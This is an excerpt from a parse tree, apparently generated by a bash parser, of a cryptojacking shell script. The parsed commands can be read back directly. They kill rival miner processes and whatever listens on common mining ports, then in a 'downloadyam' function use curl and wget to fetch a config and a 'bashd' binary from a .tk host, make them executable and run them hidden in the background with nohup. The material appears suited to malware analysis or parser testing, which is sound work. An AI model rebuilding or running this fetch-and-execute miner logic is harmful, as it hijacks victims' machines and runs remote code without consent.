        OperatorNode(lineno=52, op='\n', pos=(1869, 1870)),
        CommandNode(lineno=52, pos=(1870, 1888), parts=[
          WordNode(lineno=52, pos=(1870, 1875), word='pkill'),
          WordNode(lineno=52, pos=(1876, 1878), word='-f'),
          WordNode(lineno=52, pos=(1879, 1888), word='minergate'),
        ]),
        OperatorNode(lineno=53, op='\n', pos=(1888, 1889)),
        CommandNode(lineno=53, pos=(1889, 1906), parts=[
          WordNode(lineno=53, pos=(1889, 1894), word='pkill'),
          WordNode(lineno=53, pos=(1895, 1897), word='-f'),
          WordNode(lineno=53, pos=(1898, 1906), word='Guard.sh'),
        ]),
        OperatorNode(lineno=54, op='\n', pos=(1906, 1907)),
        CommandNode(lineno=54, pos=(1907, 1922), parts=[
          WordNode(lineno=54, pos=(1907, 1912), word='pkill'),
          WordNode(lineno=54, pos=(1913, 1915), word='-f'),
          WordNode(lineno=54, pos=(1916, 1922), word='ysaydh'),
        ]),
        OperatorNode(lineno=55, op='\n', pos=(1922, 1923)),
        CommandNode(lineno=55, pos=(1923, 1937), parts=[
          WordNode(lineno=55, pos=(1923, 1928), word='pkill'),
          WordNode(lineno=55, pos=(1929, 1931), word='-f'),
          WordNode(lineno=55, pos=(1932, 1937), word='bonns'),
        ]),
        OperatorNode(lineno=56, op='\n', pos=(1937, 1938)),
        CommandNode(lineno=56, pos=(1938, 1952), parts=[
          WordNode(lineno=56, pos=(1938, 1943), word='pkill'),
          WordNode(lineno=56, pos=(1944, 1946), word='-f'),
          WordNode(lineno=56, pos=(1947, 1952), word='donns'),
        ]),
        OperatorNode(lineno=57, op='\n', pos=(1952, 1953)),
        CommandNode(lineno=57, pos=(1953, 1966), parts=[
          WordNode(lineno=57, pos=(1953, 1958), word='pkill'),
          WordNode(lineno=57, pos=(1959, 1961), word='-f'),
          WordNode(lineno=57, pos=(1962, 1966), word='kxjd'),
        ]),
        OperatorNode(lineno=58, op='\n', pos=(1966, 1967)),
        CommandNode(lineno=58, pos=(1967, 1983), parts=[
          WordNode(lineno=58, pos=(1967, 1972), word='pkill'),
          WordNode(lineno=58, pos=(1973, 1975), word='-f'),
          WordNode(lineno=58, pos=(1976, 1983), word='Duck.sh'),
        ]),
        OperatorNode(lineno=59, op='\n', pos=(1983, 1984)),
        CommandNode(lineno=59, pos=(1984, 2000), parts=[
          WordNode(lineno=59, pos=(1984, 1989), word='pkill'),
          WordNode(lineno=59, pos=(1990, 1992), word='-f'),
          WordNode(lineno=59, pos=(1993, 2000), word='bonn.sh'),
        ]),
        OperatorNode(lineno=60, op='\n', pos=(2000, 2001)),
        CommandNode(lineno=60, pos=(2001, 2017), parts=[
          WordNode(lineno=60, pos=(2001, 2006), word='pkill'),
          WordNode(lineno=60, pos=(2007, 2009), word='-f'),
          WordNode(lineno=60, pos=(2010, 2017), word='conn.sh'),
        ]),
        OperatorNode(lineno=61, op='\n', pos=(2017, 2018)),
        CommandNode(lineno=61, pos=(2018, 2036), parts=[
          WordNode(lineno=61, pos=(2018, 2023), word='pkill'),
          WordNode(lineno=61, pos=(2024, 2026), word='-f'),
          WordNode(lineno=61, pos=(2027, 2036), word='kworker34'),
        ]),
        OperatorNode(lineno=62, op='\n', pos=(2036, 2037)),
        CommandNode(lineno=62, pos=(2037, 2051), parts=[
          WordNode(lineno=62, pos=(2037, 2042), word='pkill'),
          WordNode(lineno=62, pos=(2043, 2045), word='-f'),
          WordNode(lineno=62, pos=(2046, 2051), word='kw.sh'),
        ]),
        OperatorNode(lineno=63, op='\n', pos=(2051, 2052)),
        CommandNode(lineno=63, pos=(2052, 2067), parts=[
          WordNode(lineno=63, pos=(2052, 2057), word='pkill'),
          WordNode(lineno=63, pos=(2058, 2060), word='-f'),
          WordNode(lineno=63, pos=(2061, 2067), word='pro.sh'),
        ]),
        OperatorNode(lineno=64, op='\n', pos=(2067, 2068)),
        CommandNode(lineno=64, pos=(2068, 2084), parts=[
          WordNode(lineno=64, pos=(2068, 2073), word='pkill'),
          WordNode(lineno=64, pos=(2074, 2076), word='-f'),
          WordNode(lineno=64, pos=(2077, 2084), word='polkitd'),
        ]),
        OperatorNode(lineno=65, op='\n', pos=(2084, 2085)),
        CommandNode(lineno=65, pos=(2085, 2099), parts=[
          WordNode(lineno=65, pos=(2085, 2090), word='pkill'),
          WordNode(lineno=65, pos=(2091, 2093), word='-f'),
          WordNode(lineno=65, pos=(2094, 2099), word='acpid'),
        ]),
        OperatorNode(lineno=66, op='\n', pos=(2099, 2100)),
        CommandNode(lineno=66, pos=(2100, 2114), parts=[
          WordNode(lineno=66, pos=(2100, 2105), word='pkill'),
          WordNode(lineno=66, pos=(2106, 2108), word='-f'),
          WordNode(lineno=66, pos=(2109, 2114), word='icb5o'),
        ]),
        OperatorNode(lineno=67, op='\n', pos=(2114, 2115)),
        CommandNode(lineno=67, pos=(2115, 2129), parts=[
          WordNode(lineno=67, pos=(2115, 2120), word='pkill'),
          WordNode(lineno=67, pos=(2121, 2123), word='-f'),
          WordNode(lineno=67, pos=(2124, 2129), word='nopxi'),
        ]),
        OperatorNode(lineno=68, op='\n', pos=(2129, 2130)),
        CommandNode(lineno=68, pos=(2130, 2149), parts=[
          WordNode(lineno=68, pos=(2130, 2135), word='pkill'),
          WordNode(lineno=68, pos=(2136, 2138), word='-f'),
          WordNode(lineno=68, pos=(2139, 2149), word='irqbalanc1'),
        ]),
        OperatorNode(lineno=69, op='\n', pos=(2149, 2150)),
        CommandNode(lineno=69, pos=(2150, 2165), parts=[
          WordNode(lineno=69, pos=(2150, 2155), word='pkill'),
          WordNode(lineno=69, pos=(2156, 2158), word='-f'),
          WordNode(lineno=69, pos=(2159, 2165), word='minerd'),
        ]),
        OperatorNode(lineno=70, op='\n', pos=(2165, 2166)),
        CommandNode(lineno=70, pos=(2166, 2179), parts=[
          WordNode(lineno=70, pos=(2166, 2171), word='pkill'),
          WordNode(lineno=70, pos=(2172, 2174), word='-f'),
          WordNode(lineno=70, pos=(2175, 2179), word='i586'),
        ]),
        OperatorNode(lineno=71, op='\n', pos=(2179, 2180)),
        CommandNode(lineno=71, pos=(2180, 2193), parts=[
          WordNode(lineno=71, pos=(2180, 2185), word='pkill'),
          WordNode(lineno=71, pos=(2186, 2188), word='-f'),
          WordNode(lineno=71, pos=(2189, 2193), word='gddr'),
        ]),
        OperatorNode(lineno=72, op='\n', pos=(2193, 2194)),
        CommandNode(lineno=72, pos=(2194, 2209), parts=[
          WordNode(lineno=72, pos=(2194, 2199), word='pkill'),
          WordNode(lineno=72, pos=(2200, 2202), word='-f'),
          WordNode(lineno=72, pos=(2203, 2209), word='mstxmr'),
        ]),
        OperatorNode(lineno=73, op='\n', pos=(2209, 2210)),
        CommandNode(lineno=73, pos=(2210, 2227), parts=[
          WordNode(lineno=73, pos=(2210, 2215), word='pkill'),
          WordNode(lineno=73, pos=(2216, 2218), word='-f'),
          WordNode(lineno=73, pos=(2219, 2227), word='ddg.2011'),
        ]),
        OperatorNode(lineno=74, op='\n', pos=(2227, 2228)),
        CommandNode(lineno=74, pos=(2228, 2243), parts=[
          WordNode(lineno=74, pos=(2228, 2233), word='pkill'),
          WordNode(lineno=74, pos=(2234, 2236), word='-f'),
          WordNode(lineno=74, pos=(2237, 2243), word='wnTKYg'),
        ]),
        OperatorNode(lineno=75, op='\n', pos=(2243, 2244)),
        CommandNode(lineno=75, pos=(2244, 2259), parts=[
          WordNode(lineno=75, pos=(2244, 2249), word='pkill'),
          WordNode(lineno=75, pos=(2250, 2252), word='-f'),
          WordNode(lineno=75, pos=(2253, 2259), word='deamon'),
        ]),
        OperatorNode(lineno=76, op='\n', pos=(2259, 2260)),
        CommandNode(lineno=76, pos=(2260, 2280), parts=[
          WordNode(lineno=76, pos=(2260, 2265), word='pkill'),
          WordNode(lineno=76, pos=(2266, 2268), word='-f'),
          WordNode(lineno=76, pos=(2269, 2280), word='disk_genius'),
        ]),
        OperatorNode(lineno=77, op='\n', pos=(2280, 2281)),
        CommandNode(lineno=77, pos=(2281, 2298), parts=[
          WordNode(lineno=77, pos=(2281, 2286), word='pkill'),
          WordNode(lineno=77, pos=(2287, 2289), word='-f'),
          WordNode(lineno=77, pos=(2290, 2298), word='sourplum'),
        ]),
        OperatorNode(lineno=78, op='\n', pos=(2298, 2299)),
        CommandNode(lineno=78, pos=(2299, 2321), parts=[
          WordNode(lineno=78, pos=(2299, 2301), word='rm'),
          WordNode(lineno=78, pos=(2302, 2305), word='-rf'),
          WordNode(lineno=78, pos=(2306, 2321), word='/tmp/httpd.conf'),
        ]),
        OperatorNode(lineno=79, op='\n', pos=(2321, 2322)),
        CommandNode(lineno=79, pos=(2322, 2338), parts=[
          WordNode(lineno=79, pos=(2322, 2324), word='rm'),
          WordNode(lineno=79, pos=(2325, 2328), word='-rf'),
          WordNode(lineno=79, pos=(2329, 2338), word='/tmp/conn'),
        ]),
        OperatorNode(lineno=80, op='\n', pos=(2338, 2339)),
        CommandNode(lineno=80, pos=(2339, 2356), parts=[
          WordNode(lineno=80, pos=(2339, 2341), word='rm'),
          WordNode(lineno=80, pos=(2342, 2345), word='-rf'),
          WordNode(lineno=80, pos=(2346, 2356), word='/tmp/conns'),
        ]),
        OperatorNode(lineno=81, op='\n', pos=(2356, 2357)),
        CommandNode(lineno=81, pos=(2357, 2374), parts=[
          WordNode(lineno=81, pos=(2357, 2359), word='rm'),
          WordNode(lineno=81, pos=(2360, 2362), word='-f'),
          WordNode(lineno=81, pos=(2363, 2374), word='/tmp/irq.sh'),
        ]),
        OperatorNode(lineno=82, op='\n', pos=(2374, 2375)),
        CommandNode(lineno=82, pos=(2375, 2396), parts=[
          WordNode(lineno=82, pos=(2375, 2377), word='rm'),
          WordNode(lineno=82, pos=(2378, 2380), word='-f'),
          WordNode(lineno=82, pos=(2381, 2396), word='/tmp/irqbalanc1'),
        ]),
        OperatorNode(lineno=83, op='\n', pos=(2396, 2397)),
        CommandNode(lineno=83, pos=(2397, 2411), parts=[
          WordNode(lineno=83, pos=(2397, 2399), word='rm'),
          WordNode(lineno=83, pos=(2400, 2402), word='-f'),
          WordNode(lineno=83, pos=(2403, 2411), word='/tmp/irq'),
        ]),
        OperatorNode(lineno=84, op='\n', pos=(2411, 2412)),
        CommandNode(lineno=84, pos=(2412, 2428), parts=[
          AssignmentNode(lineno=84, pos=(2412, 2428), word='PORT_NUMBER=3333'),
        ]),
        OperatorNode(lineno=85, op='\n', pos=(2428, 2429)),
        PipelineNode(lineno=85, pos=(2429, 2496), parts=[
          CommandNode(lineno=85, pos=(2429, 2455), parts=[
            WordNode(lineno=85, pos=(2429, 2433), word='lsof'),
            WordNode(lineno=85, pos=(2434, 2436), word='-i'),
            WordNode(lineno=85, pos=(2437, 2455), word='tcp:${PORT_NUMBER}', parts=[
              ParameterNode(lineno=85, pos=(2441, 2455), value='PORT_NUMBER'),
            ]),
          ]),
          PipeNode(lineno=85, pipe='|', pos=(2456, 2457)),
          CommandNode(lineno=85, pos=(2458, 2480), parts=[
            WordNode(lineno=85, pos=(2458, 2461), word='awk'),
            WordNode(lineno=85, pos=(2462, 2480), word='NR!=1 {print $2}'),
          ]),
          PipeNode(lineno=85, pipe='|', pos=(2481, 2482)),
          CommandNode(lineno=85, pos=(2483, 2496), parts=[
            WordNode(lineno=85, pos=(2483, 2488), word='xargs'),
            WordNode(lineno=85, pos=(2489, 2493), word='kill'),
            WordNode(lineno=85, pos=(2494, 2496), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=86, op='\n', pos=(2496, 2497)),
        CommandNode(lineno=86, pos=(2497, 2513), parts=[
          AssignmentNode(lineno=86, pos=(2497, 2513), word='PORT_NUMBER=5555'),
        ]),
        OperatorNode(lineno=87, op='\n', pos=(2513, 2514)),
        PipelineNode(lineno=87, pos=(2514, 2581), parts=[
          CommandNode(lineno=87, pos=(2514, 2540), parts=[
            WordNode(lineno=87, pos=(2514, 2518), word='lsof'),
            WordNode(lineno=87, pos=(2519, 2521), word='-i'),
            WordNode(lineno=87, pos=(2522, 2540), word='tcp:${PORT_NUMBER}', parts=[
              ParameterNode(lineno=87, pos=(2526, 2540), value='PORT_NUMBER'),
            ]),
          ]),
          PipeNode(lineno=87, pipe='|', pos=(2541, 2542)),
          CommandNode(lineno=87, pos=(2543, 2565), parts=[
            WordNode(lineno=87, pos=(2543, 2546), word='awk'),
            WordNode(lineno=87, pos=(2547, 2565), word='NR!=1 {print $2}'),
          ]),
          PipeNode(lineno=87, pipe='|', pos=(2566, 2567)),
          CommandNode(lineno=87, pos=(2568, 2581), parts=[
            WordNode(lineno=87, pos=(2568, 2573), word='xargs'),
            WordNode(lineno=87, pos=(2574, 2578), word='kill'),
            WordNode(lineno=87, pos=(2579, 2581), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=88, op='\n', pos=(2581, 2582)),
        CommandNode(lineno=88, pos=(2582, 2598), parts=[
          AssignmentNode(lineno=88, pos=(2582, 2598), word='PORT_NUMBER=7777'),
        ]),
        OperatorNode(lineno=89, op='\n', pos=(2598, 2599)),
        PipelineNode(lineno=89, pos=(2599, 2666), parts=[
          CommandNode(lineno=89, pos=(2599, 2625), parts=[
            WordNode(lineno=89, pos=(2599, 2603), word='lsof'),
            WordNode(lineno=89, pos=(2604, 2606), word='-i'),
            WordNode(lineno=89, pos=(2607, 2625), word='tcp:${PORT_NUMBER}', parts=[
              ParameterNode(lineno=89, pos=(2611, 2625), value='PORT_NUMBER'),
            ]),
          ]),
          PipeNode(lineno=89, pipe='|', pos=(2626, 2627)),
          CommandNode(lineno=89, pos=(2628, 2650), parts=[
            WordNode(lineno=89, pos=(2628, 2631), word='awk'),
            WordNode(lineno=89, pos=(2632, 2650), word='NR!=1 {print $2}'),
          ]),
          PipeNode(lineno=89, pipe='|', pos=(2651, 2652)),
          CommandNode(lineno=89, pos=(2653, 2666), parts=[
            WordNode(lineno=89, pos=(2653, 2658), word='xargs'),
            WordNode(lineno=89, pos=(2659, 2663), word='kill'),
            WordNode(lineno=89, pos=(2664, 2666), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=90, op='\n', pos=(2666, 2667)),
        CommandNode(lineno=90, pos=(2667, 2684), parts=[
          AssignmentNode(lineno=90, pos=(2667, 2684), word='PORT_NUMBER=14444'),
        ]),
        OperatorNode(lineno=91, op='\n', pos=(2684, 2685)),
        PipelineNode(lineno=91, pos=(2685, 2752), parts=[
          CommandNode(lineno=91, pos=(2685, 2711), parts=[
            WordNode(lineno=91, pos=(2685, 2689), word='lsof'),
            WordNode(lineno=91, pos=(2690, 2692), word='-i'),
            WordNode(lineno=91, pos=(2693, 2711), word='tcp:${PORT_NUMBER}', parts=[
              ParameterNode(lineno=91, pos=(2697, 2711), value='PORT_NUMBER'),
            ]),
          ]),
          PipeNode(lineno=91, pipe='|', pos=(2712, 2713)),
          CommandNode(lineno=91, pos=(2714, 2736), parts=[
            WordNode(lineno=91, pos=(2714, 2717), word='awk'),
            WordNode(lineno=91, pos=(2718, 2736), word='NR!=1 {print $2}'),
          ]),
          PipeNode(lineno=91, pipe='|', pos=(2737, 2738)),
          CommandNode(lineno=91, pos=(2739, 2752), parts=[
            WordNode(lineno=91, pos=(2739, 2744), word='xargs'),
            WordNode(lineno=91, pos=(2745, 2749), word='kill'),
            WordNode(lineno=91, pos=(2750, 2752), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=92, op='\n', pos=(2752, 2753)),
      ]),
    ReservedwordNode(lineno=92, pos=(2753, 2754), word='}'),
  ], pos=(110, 2754)),
])
FunctionNode(lineno=176, pos=(2755, 5179), parts=[
  ReservedwordNode(lineno=93, pos=(2755, 2763), word='function'),
  WordNode(lineno=93, pos=(2764, 2775), word='downloadyam'),
  ReservedwordNode(lineno=93, pos=(2775, 2776), word='('),
  ReservedwordNode(lineno=93, pos=(2776, 2777), word=')'),
  CompoundNode(lineno=176, list=[
    ReservedwordNode(lineno=93, pos=(2778, 2779), word='{'),
    ListNode(lineno=176, pos=(2781, 5178), parts=[
        CompoundNode(lineno=100, list=[
          IfNode(lineno=100, pos=(2781, 3073), parts=[
            ReservedwordNode(lineno=94, pos=(2781, 2783), word='if'),
            ListNode(lineno=94, pos=(2784, 2812), parts=[
                CommandNode(lineno=94, pos=(2784, 2811), parts=[
                  WordNode(lineno=94, pos=(2784, 2785), word='['),
                  WordNode(lineno=94, pos=(2786, 2787), word='!'),
                  WordNode(lineno=94, pos=(2788, 2790), word='-f'),
                  WordNode(lineno=94, pos=(2791, 2809), word='/tmp/config.json'),
                  WordNode(lineno=94, pos=(2810, 2811), word=']'),
                ]),
                OperatorNode(lineno=94, op=';', pos=(2811, 2812)),
              ]),
            ReservedwordNode(lineno=94, pos=(2813, 2817), word='then'),
            ListNode(lineno=100, pos=(2821, 3070), parts=[
                CommandNode(lineno=95, pos=(2821, 2884), parts=[
                  WordNode(lineno=95, pos=(2821, 2825), word='curl'),
                  WordNode(lineno=95, pos=(2826, 2864), word='http://e3sas6tzvehwgpak.tk/config.json'),
                  WordNode(lineno=95, pos=(2865, 2867), word='-o'),
                  WordNode(lineno=95, pos=(2868, 2884), word='/tmp/config.json'),
                ]),
                OperatorNode(lineno=95, op='&&', pos=(2885, 2887)),
                CommandNode(lineno=95, pos=(2888, 2913), parts=[
                  WordNode(lineno=95, pos=(2888, 2893), word='chmod'),
                  WordNode(lineno=95, pos=(2894, 2896), word='+x'),
                  WordNode(lineno=95, pos=(2897, 2913), word='/tmp/config.json'),
                ]),
                OperatorNode(lineno=96, op='\n', pos=(2913, 2914)),
                CompoundNode(lineno=99, list=[
                  IfNode(lineno=99, pos=(2917, 3069), parts=[
                    ReservedwordNode(lineno=96, pos=(2917, 2919), word='if'),
                    ListNode(lineno=96, pos=(2920, 2948), parts=[
                        CommandNode(lineno=96, pos=(2920, 2947), parts=[
                          WordNode(lineno=96, pos=(2920, 2921), word='['),
                          WordNode(lineno=96, pos=(2922, 2923), word='!'),
                          WordNode(lineno=96, pos=(2924, 2926), word='-f'),
                          WordNode(lineno=96, pos=(2927, 2945), word='/tmp/config.json'),
                          WordNode(lineno=96, pos=(2946, 2947), word=']'),
                        ]),
                        OperatorNode(lineno=96, op=';', pos=(2947, 2948)),
                      ]),
                    ReservedwordNode(lineno=96, pos=(2949, 2953), word='then'),
                    ListNode(lineno=99, pos=(2958, 3064), parts=[
                        CommandNode(lineno=97, pos=(2958, 3009), parts=[
                          WordNode(lineno=97, pos=(2958, 2962), word='wget'),
                          WordNode(lineno=97, pos=(2963, 3001), word='http://e3sas6tzvehwgpak.tk/config.json'),
                          WordNode(lineno=97, pos=(3002, 3004), word='-P'),
                          WordNode(lineno=97, pos=(3005, 3009), word='/tmp'),
                        ]),
                        OperatorNode(lineno=97, op='&&', pos=(3010, 3012)),
                        CommandNode(lineno=97, pos=(3013, 3038), parts=[
                          WordNode(lineno=97, pos=(3013, 3018), word='chmod'),
                          WordNode(lineno=97, pos=(3019, 3021), word='+x'),
                          WordNode(lineno=97, pos=(3022, 3038), word='/tmp/config.json'),
                        ]),
                        OperatorNode(lineno=98, op='\n', pos=(3038, 3039)),
                        CommandNode(lineno=98, pos=(3043, 3063), parts=[
                          WordNode(lineno=98, pos=(3043, 3045), word='rm'),
                          WordNode(lineno=98, pos=(3046, 3049), word='-rf'),
                          WordNode(lineno=98, pos=(3050, 3063), word='config.json.*'),
                        ]),
                        OperatorNode(lineno=99, op='\n', pos=(3063, 3064)),
                      ]),
                    ReservedwordNode(lineno=99, pos=(3067, 3069), word='fi'),
                  ]),
                ], pos=(2917, 3069)),
                OperatorNode(lineno=100, op='\n', pos=(3069, 3070)),
              ]),
            ReservedwordNode(lineno=100, pos=(3071, 3073), word='fi'),
          ]),
        ], pos=(2781, 3073)),
        OperatorNode(lineno=101, op='\n', pos=(3073, 3074)),
        CompoundNode(lineno=122, list=[
          IfNode(lineno=122, pos=(3076, 3705), parts=[
            ReservedwordNode(lineno=102, pos=(3076, 3078), word='if'),
            ListNode(lineno=102, pos=(3079, 3101), parts=[
                CommandNode(lineno=102, pos=(3079, 3100), parts=[
                  WordNode(lineno=102, pos=(3079, 3080), word='['),
                  WordNode(lineno=102, pos=(3081, 3082), word='!'),
                  WordNode(lineno=102, pos=(3083, 3085), word='-f'),
                  WordNode(lineno=102, pos=(3086, 3098), word='/tmp/bashd'),
                  WordNode(lineno=102, pos=(3099, 3100), word=']'),
                ]),
                OperatorNode(lineno=102, op=';', pos=(3100, 3101)),
              ]),
            ReservedwordNode(lineno=102, pos=(3102, 3106), word='then'),
            ListNode(lineno=109, pos=(3112, 3417), parts=[
                CommandNode(lineno=103, pos=(3112, 3163), parts=[
                  WordNode(lineno=103, pos=(3112, 3116), word='curl'),
                  WordNode(lineno=103, pos=(3117, 3149), word='http://e3sas6tzvehwgpak.tk/bashd'),
                  WordNode(lineno=103, pos=(3150, 3152), word='-o'),
                  WordNode(lineno=103, pos=(3153, 3163), word='/tmp/bashd'),
                ]),
                OperatorNode(lineno=103, op='&&', pos=(3164, 3166)),
                CommandNode(lineno=103, pos=(3167, 3186), parts=[
                  WordNode(lineno=103, pos=(3167, 3172), word='chmod'),
                  WordNode(lineno=103, pos=(3173, 3175), word='+x'),
                  WordNode(lineno=103, pos=(3176, 3186), word='/tmp/bashd'),
                ]),
                OperatorNode(lineno=104, op='\n', pos=(3186, 3187)),
                CompoundNode(lineno=107, list=[
                  IfNode(lineno=107, pos=(3190, 3318), parts=[
                    ReservedwordNode(lineno=104, pos=(3190, 3192), word='if'),
                    ListNode(lineno=104, pos=(3193, 3215), parts=[
                        CommandNode(lineno=104, pos=(3193, 3214), parts=[
                          WordNode(lineno=104, pos=(3193, 3194), word='['),
                          WordNode(lineno=104, pos=(3195, 3196), word='!'),
                          WordNode(lineno=104, pos=(3197, 3199), word='-f'),
                          WordNode(lineno=104, pos=(3200, 3212), word='/tmp/bashd'),
                          WordNode(lineno=104, pos=(3213, 3214), word=']'),
                        ]),
                        OperatorNode(lineno=104, op=';', pos=(3214, 3215)),
                      ]),
                    ReservedwordNode(lineno=104, pos=(3216, 3220), word='then'),
                    ListNode(lineno=107, pos=(3225, 3313), parts=[
                        CommandNode(lineno=105, pos=(3225, 3270), parts=[
                          WordNode(lineno=105, pos=(3225, 3229), word='wget'),
                          WordNode(lineno=105, pos=(3230, 3262), word='http://e3sas6tzvehwgpak.tk/bashd'),
                          WordNode(lineno=105, pos=(3263, 3265), word='-P'),
                          WordNode(lineno=105, pos=(3266, 3270), word='/tmp'),
                        ]),
                        OperatorNode(lineno=105, op='&&', pos=(3271, 3273)),
                        CommandNode(lineno=105, pos=(3274, 3293), parts=[
                          WordNode(lineno=105, pos=(3274, 3279), word='chmod'),
                          WordNode(lineno=105, pos=(3280, 3282), word='+x'),
                          WordNode(lineno=105, pos=(3283, 3293), word='/tmp/bashd'),
                        ]),
                        OperatorNode(lineno=106, op='\n', pos=(3293, 3294)),
                        CommandNode(lineno=106, pos=(3298, 3312), parts=[
                          WordNode(lineno=106, pos=(3298, 3300), word='rm'),
                          WordNode(lineno=106, pos=(3301, 3304), word='-rf'),
                          WordNode(lineno=106, pos=(3305, 3312), word='bashd.*'),
                        ]),
                        OperatorNode(lineno=107, op='\n', pos=(3312, 3313)),
                      ]),
                    ReservedwordNode(lineno=107, pos=(3316, 3318), word='fi'),
                  ]),
                ], pos=(3190, 3318)),
                OperatorNode(lineno=108, op='\n', pos=(3318, 3319)),
                CommandNode(lineno=109, pos=(3375, 3415), parts=[
                  WordNode(lineno=109, pos=(3375, 3380), word='nohup'),
                  WordNode(lineno=109, pos=(3381, 3391), word='/tmp/bashd'),
                  WordNode(lineno=109, pos=(3392, 3394), word='-p'),
                  WordNode(lineno=109, pos=(3395, 3400), word='bashd'),
                  RedirectNode(lineno=109, output=
                    WordNode(lineno=109, pos=(3401, 3410), word='/dev/null'), pos=(3400, 3410), type='>'),
                  RedirectNode(input=2, lineno=109, output=1, pos=(3411, 3415), type='>&'),
                ]),
                OperatorNode(lineno=109, op='&', pos=(3416, 3417)),
              ]),
            ReservedwordNode(lineno=110, pos=(3419, 3423), word='else'),
            ListNode(lineno=122, pos=(3456, 3702), parts=[
                CommandNode(lineno=113, pos=(3456, 3503), parts=[
                  AssignmentNode(lineno=113, pos=(3456, 3503), word='p=$(ps aux | grep bashd | grep -v grep | wc -l)', parts=[
                    CommandsubstitutionNode(command=
                      PipelineNode(lineno=93, pos=(3460, 3502), parts=[
                        CommandNode(lineno=93, pos=(3460, 3466), parts=[
                          WordNode(lineno=93, pos=(3460, 3462), word='ps'),
                          WordNode(lineno=93, pos=(3463, 3466), word='aux'),
                        ]),
                        PipeNode(lineno=93, pipe='|', pos=(3467, 3468)),
                        CommandNode(lineno=93, pos=(3469, 3479), parts=[
                          WordNode(lineno=93, pos=(3469, 3473), word='grep'),
                          WordNode(lineno=93, pos=(3474, 3479), word='bashd'),
                        ]),
                        PipeNode(lineno=93, pipe='|', pos=(3480, 3481)),
                        CommandNode(lineno=93, pos=(3482, 3494), parts=[
                          WordNode(lineno=93, pos=(3482, 3486), word='grep'),
                          WordNode(lineno=93, pos=(3487, 3489), word='-v'),
                          WordNode(lineno=93, pos=(3490, 3494), word='grep'),
                        ]),
                        PipeNode(lineno=93, pipe='|', pos=(3495, 3496)),
                        CommandNode(lineno=93, pos=(3497, 3502), parts=[
                          WordNode(lineno=93, pos=(3497, 3499), word='wc'),
                          WordNode(lineno=93, pos=(3500, 3502), word='-l'),
                        ]),
                      ]), lineno=93, pos=(3458, 3503)),
                  ]),
                ]),
                OperatorNode(lineno=114, op='\n', pos=(3503, 3504)),
                CompoundNode(lineno=121, list=[
                  IfNode(lineno=121, pos=(3507, 3701), parts=[
                    ReservedwordNode(lineno=114, pos=(3507, 3509), word='if'),
                    ListNode(lineno=114, pos=(3510, 3525), parts=[
                        CommandNode(lineno=114, pos=(3510, 3524), parts=[
                          WordNode(lineno=114, pos=(3510, 3511), word='['),
                          WordNode(lineno=114, pos=(3512, 3516), word='${p}', parts=[
                            ParameterNode(lineno=114, pos=(3512, 3516), value='p'),
                          ]),
                          WordNode(lineno=114, pos=(3517, 3520), word='-eq'),
                          WordNode(lineno=114, pos=(3521, 3522), word='1'),
                          WordNode(lineno=114, pos=(3523, 3524), word=']'),
                        ]),
                        OperatorNode(lineno=114, op=';', pos=(3524, 3525)),
                      ]),
                    ReservedwordNode(lineno=114, pos=(3525, 3529), word='then'),
                    CommandNode(lineno=115, pos=(3534, 3546), parts=[
                      WordNode(lineno=115, pos=(3534, 3538), word='echo'),
                      WordNode(lineno=115, pos=(3539, 3546), word='bashd'),
                    ]),
                    ReservedwordNode(lineno=116, pos=(3550, 3554), word='elif'),
                    ListNode(lineno=116, pos=(3555, 3570), parts=[
                        CommandNode(lineno=116, pos=(3555, 3569), parts=[
                          WordNode(lineno=116, pos=(3555, 3556), word='['),
                          WordNode(lineno=116, pos=(3557, 3561), word='${p}', parts=[
                            ParameterNode(lineno=116, pos=(3557, 3561), value='p'),
                          ]),
                          WordNode(lineno=116, pos=(3562, 3565), word='-eq'),
                          WordNode(lineno=116, pos=(3566, 3567), word='0'),
                          WordNode(lineno=116, pos=(3568, 3569), word=']'),
                        ]),
                        OperatorNode(lineno=116, op=';', pos=(3569, 3570)),
                      ]),
                    ReservedwordNode(lineno=116, pos=(3570, 3574), word='then'),
                    ListNode(lineno=118, pos=(3633, 3675), parts=[
                        CommandNode(lineno=118, pos=(3633, 3673), parts=[
                          WordNode(lineno=118, pos=(3633, 3638), word='nohup'),
                          WordNode(lineno=118, pos=(3639, 3649), word='/tmp/bashd'),
                          WordNode(lineno=118, pos=(3650, 3652), word='-p'),
                          WordNode(lineno=118, pos=(3653, 3658), word='bashd'),
                          RedirectNode(lineno=118, output=
                            WordNode(lineno=118, pos=(3659, 3668), word='/dev/null'), pos=(3658, 3668), type='>'),
                          RedirectNode(input=2, lineno=118, output=1, pos=(3669, 3673), type='>&'),
                        ]),
                        OperatorNode(lineno=118, op='&', pos=(3674, 3675)),
                      ]),
                    ReservedwordNode(lineno=119, pos=(3679, 3683), word='else'),
                    CommandNode(lineno=120, pos=(3688, 3695), parts=[
                      WordNode(lineno=120, pos=(3688, 3692), word='echo'),
                      WordNode(lineno=120, pos=(3693, 3695)),
                    ]),
                    ReservedwordNode(lineno=121, pos=(3699, 3701), word='fi'),
                  ]),
                ], pos=(3507, 3701)),
                OperatorNode(lineno=122, op='\n', pos=(3701, 3702)),
              ]),
            ReservedwordNode(lineno=122, pos=(3703, 3705), word='fi'),
          ]),
        ], pos=(3076, 3705)),
        OperatorNode(lineno=123, op='\n', pos=(3705, 3706)),
        CommandNode(lineno=124, pos=(3708, 3716), parts=[
          WordNode(lineno=124, pos=(3708, 3713), word='sleep'),
          WordNode(lineno=124, pos=(3714, 3716), word='15'),
        ]),
        OperatorNode(lineno=125, op='\n', pos=(3716, 3717)),
        CommandNode(lineno=126, pos=(3719, 3766), parts=[
          AssignmentNode(lineno=126, pos=(3719, 3766), word='p=$(ps aux | grep bashd | grep -v grep | wc -l)', parts=[
            CommandsubstitutionNode(command=
              PipelineNode(lineno=93, pos=(3723, 3765), parts=[
                CommandNode(lineno=93, pos=(3723, 3729), parts=[
                  WordNode(lineno=93, pos=(3723, 3725), word='ps'),
                  WordNode(lineno=93, pos=(3726, 3729), word='aux'),
                ]),
                PipeNode(lineno=93, pipe='|', pos=(3730, 3731)),
                CommandNode(lineno=93, pos=(3732, 3742), parts=[
                  WordNode(lineno=93, pos=(3732, 3736), word='grep'),
                  WordNode(lineno=93, pos=(3737, 3742), word='bashd'),
                ]),
                PipeNode(lineno=93, pipe='|', pos=(3743, 3744)),
                CommandNode(lineno=93, pos=(3745, 3757), parts=[
